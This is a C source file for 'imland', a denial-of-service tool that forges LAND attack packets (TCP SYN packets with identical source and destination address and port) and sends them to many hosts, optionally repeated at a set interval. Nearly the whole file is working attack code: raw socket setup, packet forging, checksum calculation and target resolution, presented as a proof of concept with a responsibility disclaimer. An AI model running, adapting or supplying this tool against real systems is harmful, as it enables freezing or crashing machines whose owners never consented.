/* * imland - improved multiple land * * A good spanking session requires several good, hard slaps. * * This program lands multiple land attacks on multiple hosts as a * proof of concept of the oldly discovered but newly resurfaced * M$ `land' attack vulnerability. It was written without ill intent to * test a large range of servers for vulnerabilities in one go. * * If the targeted machines freeze up for 5-30 seconds for each packet, * that means they are vulnerable. * * Disclaimer: * This program was written without ill intent. It was designed to test * and prove the effects of the LAND attack on multiple hosts at once. * I am in no way responsible for what you do with this piece of code. * * Please use it responsibly to test your own servers only. * */ #define _BSD_SOURCE #define __FAVOR_BSD #include #include #include #include #include #include #include #include #include #include #include #include /* the attack packet */ struct raw_tcp_packet { struct ip ip; struct tcphdr tcp; }; /* required to make the TCP checksum correct */ struct tcp_chksum_hdr { struct in_addr src; struct in_addr dest; u_char zero; u_char proto; u_short len; struct tcphdr tcp; }; /* linked list with all we need, really */ typedef struct target { struct sockaddr_in sa; struct { struct iphdr ip; /* included here so we can build them once */ struct tcphdr tcp; /* and thus transmit a tiny bit faster */ } pkt; struct target *next; } target; /** prototypes **/ int send_land(int, struct target *); void u_sleep(u_int); int add_target_ip(char *, struct in_addr *, u_short); u_int get_timevar(const char *); int add_target(char *); unsigned short chksum(unsigned short *, int); void finish(int); void crash(const char *, ...); void usage(void); /** external **/ extern int optind, opterr, optopt; extern int h_errno; extern char *optarg; extern char *__progname; /** global variables **/ target *list = NULL, *cursor = NULL; int targets = 0; int pkt_interval = 0; /* no delay by default */ int pkts = 1, pkts_sent = 0; /* send one per host by default */ int debug = 0; u_short defport = 139; /* default port */ /** code start **/ void crash(const char *fmt, ...) { va_list ap; printf("%s: ", __progname); va_start(ap, fmt); vprintf(fmt, ap); va_end(ap); if(errno) printf(": %s", strerror(errno)); puts(""); exit(3); } int main(int argc, char **argv) { target *host; int sock, foo; if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) crash("socket()"); while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) { switch(foo) { case 'v': debug++; break; case 'i': pkt_interval = get_timevar(optarg); break; case 'p': defport = (u_short)strtoul(optarg, NULL, 0); break; case 'n': pkts = strtoul(optarg, NULL, 0); if(debug) printf("Sending %d packets\n", pkts); break; default: add_target(optarg); break; } } argv = &argv[optind]; while(*argv) { add_target(*argv); argv++; } if(!targets) usage(); while(!pkts || pkts > pkts_sent) { host = list; while(host) { printf("Sending to %s:%u ... ", inet_ntoa(host->sa.sin_addr), host->sa.sin_port); foo = send_land(sock, host); if(foo == - 1) printf("failed - %s\n", strerror(errno)); else printf("ok, landed %d bytes\n", foo); if(pkt_interval) u_sleep(pkt_interval); host = host->next; } pkts_sent++; } return 0; } /* build and send the land attack packet */ int send_land(int sock, struct target *host) { struct raw_tcp_packet pkt; struct tcp_chksum_hdr tcc; memset(&pkt, 0, sizeof(pkt)); memset(&tcc, 0, sizeof(tcc)); /* ip options */ pkt.ip.ip_v = IPVERSION; pkt.ip.ip_hl = sizeof(struct iphdr) / 4; pkt.ip.ip_tos = 0; pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr)); pkt.ip.ip_off = htons(IP_DF); pkt.ip.ip_ttl = 0xff; pkt.ip.ip_p = IPPROTO_TCP; pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr; pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr)); tcc.src = tcc.dest = host->sa.sin_addr; tcc.zero = 0; tcc.proto = IPPROTO_TCP; tcc.len = htons(sizeof(struct tcphdr)); tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port); tcc.tcp.th_seq = htons(0x1d1); tcc.tcp.th_off = sizeof(struct ip) / 4; tcc.tcp.th_flags = TH_SYN; tcc.tcp.th_win = htons(512); memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr)); pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc)); return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa, sizeof(struct sockaddr_in)); } /* calculate checksum */ u_short chksum(u_short *p, int n) { register long sum = 0; while(n > 1) { sum += *p++; n -= 2; } /* mop up the occasional odd byte */ if(n == 1) sum += *(u_char *)p; sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum = sum + (sum >> 16); /* add carry */ return ~sum; /* ones-complement, truncate */ } /* usleep() the portable way. No error checking is done, * so this might theoretically fail. */ void u_sleep(u_int u_sec) { struct timeval to; fd_set readset, writeset; if(debug > 3) printf("sleeping for %u microseconds\n", u_sec); if(!u_sec) return; to.tv_sec = u_sec / 1000000; to.tv_usec = u_sec % 1000000; FD_ZERO(&writeset); FD_ZERO(&readset); select(0, &readset, &writeset, NULL, &to); return; } int add_target_ip(char *arg, struct in_addr *in, u_short port) { struct target *host; /* disregard obviously stupid addresses */ if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY) return -1; if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port); /* add the fresh ip */ host = malloc(sizeof(struct target)); if(!host) { crash("add_target_ip(%s, %s): malloc(%d) failed", arg, inet_ntoa(*in), sizeof(struct target)); } memset(host, 0, sizeof(struct target)); /* fill out the sockaddr_in struct */ host->sa.sin_family = AF_INET; host->sa.sin_addr.s_addr = in->s_addr; host->sa.sin_port = port ? port : defport; if(!list) list = host; else cursor->next = host; cursor = host; targets++; return 0; } /* wrapper for add_target_ip to resolve stuff as well */ int add_target(char *arg) { int i; struct hostent *he; struct in_addr *in, ip; char *port_str; u_short port = 0; if(!arg) return -1; if((port_str = strchr(arg, ':'))) { *port_str = '\0'; port_str++; if(*port_str) port = (u_short)strtoul(port_str, NULL, 0); } /* don't resolve if we don't have to */ if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port); /* not an IP, so resolve */ errno = 0; he = gethostbyname(arg); if(!he && h_errno == TRY_AGAIN) { u_sleep(500000); he = gethostbyname(arg); } if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno)); /* add all the IP's as targets */ for(i = 0; he->h_addr_list[i]; i++) { in = (struct in_addr *)he->h_addr_list[i]; add_target_ip(arg, in, port); } return 0; } /* * u = micro * m = milli * s = seconds * return value is in microseconds */ u_int get_timevar(const char *str) { char p, u, *ptr; unsigned int len; u_int i, d; /* integer and decimal, respectively */ u_int factor = 1000; /* default to milliseconds */ if(!str) return 0; len = strlen(str); if(!len) return 0; /* unit might be given as ms|m (millisec), * us|u (microsec) or just plain s, for seconds */ u = p = '\0'; u = str[len - 1]; if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2]; if(p && u == 's') u = p; else if(!p) p = u; if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p); if(u == 'u') factor = 1; /* microseconds */ else if(u == 'm') factor = 1000; /* milliseconds */ else if(u == 's') factor = 1000000; /* seconds */ if(debug > 3) printf("factor is %u\n", factor); i = strtoul(str, &ptr, 0); if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1) return i * factor; /* time specified in usecs can't have decimal points, so ignore them */ if(factor == 1) return i; d = strtoul(ptr + 1, NULL, 0); /* d is decimal, so get rid of excess baggage */ while(d >= factor) d /= 10; /* the last parenthesis avoids floating point exceptions. */ return ((i * factor) + (d * (factor / 10))); } void usage(void) { printf("Usage: %s -i -p -n host1:port1 hostn:portn\n\n", __progname); printf("-i sets packet interval in milliseconds.\n"); printf(" You can specify Nus for N microseconds, or Ns for N seconds.\n"); printf(" Default is 0, which is good for multiple hosts and one packet.\n"); printf(" If you want to send continuously, specify 1s or more, so as to not\n"); printf(" cause DoS due to sheer traffic volume.\n\n"); printf("-p sets the DEFAULT port (139 if not specified)\n\n"); printf("-n determines how many packets to send to each target. Default is 1\n\n"); printf("host:port combinations can be given as such;\n"); printf("The port part of a target definition ovverrides the defaults.\n\n"); printf("Hostnames will be resolved, if possible.\n"); exit(1); }